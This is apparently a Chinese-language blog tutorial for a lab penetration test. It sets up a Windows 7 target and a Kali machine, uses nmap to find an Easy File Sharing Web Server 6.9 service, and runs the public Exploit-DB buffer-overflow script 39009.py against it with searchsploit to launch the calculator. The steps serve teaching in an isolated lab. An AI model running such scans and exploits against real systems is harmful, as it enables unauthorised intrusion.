漏洞渗透测试
一、准备1.Win7靶机2.kali虚拟机3.efssetup_2018.exe如未安装Win7靶机,可参考以下链接:史上最详细的虚拟机VMware12安装Windows7教程_威士忌荡出の忧伤的博客-CSDN博客_虚拟机安装win7kali虚拟机安装可参考以下链接:Kali Linux 安装过程 超详细(图文并茂,通用版)_好好学习-CSDN博客_kali linux安装教程efs
目录
一、准备
1.Win7靶机
2.kali虚拟机
3.efssetup_2018.exe
如未安装Win7靶机,可参考以下链接:
史上最详细的虚拟机VMware12安装Windows7教程_威士忌荡出の忧伤的博客-CSDN博客_虚拟机安装win7
kali虚拟机安装可参考以下链接:
Kali Linux 安装过程 超详细(图文并茂,通用版)_好好学习-CSDN博客_kali linux安装教程
efssetup_2018.exe下载:
链接:https://pan.baidu.com/s/1iHpD4RfUKGYcWDAuvqoYZQ
提取码:1csv
二、环境搭建
靶机安装easy file sharing server
在靶机中运行efssetup_2018.exe
开始安装easy file sharing server
单击“Next”
选择“I accept the agreement”并单击“Next”
选择安装位置,单击“Next”
之后一直选择默认选项即可,最后单击“Finish”完成安装
运行该程序并保持运行状态即可
三、扫描
打开kali终端,执行命令:
ifconfig
查看本机ip:192.168.234.128
执行命令:
nmap 192.168.234.0/24
扫描该网段下的全部主机
我们会发现靶机ip为192.168.234.138
并且在80端口上执行着Easy File Sharing Web Server httpd服务,版本为6.9
四、漏洞利用
在kali终端上执行命令:
searchsploit easy file sharing
可查找关于easy file sharing的漏洞
左边一栏是渗透模块名称,右边是所在位置
此处我们以/usr/share/exploitdb/exploits/windows/remote/39009.py为例
利用溢出漏洞实现在靶机执行计算器程序
kali终端执行命令:
python /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.234.138 80
此时我们回到靶机,发现程序Easy File Sharing Web Server已崩溃,并执行了计算器程序
更多推荐
所有评论(0)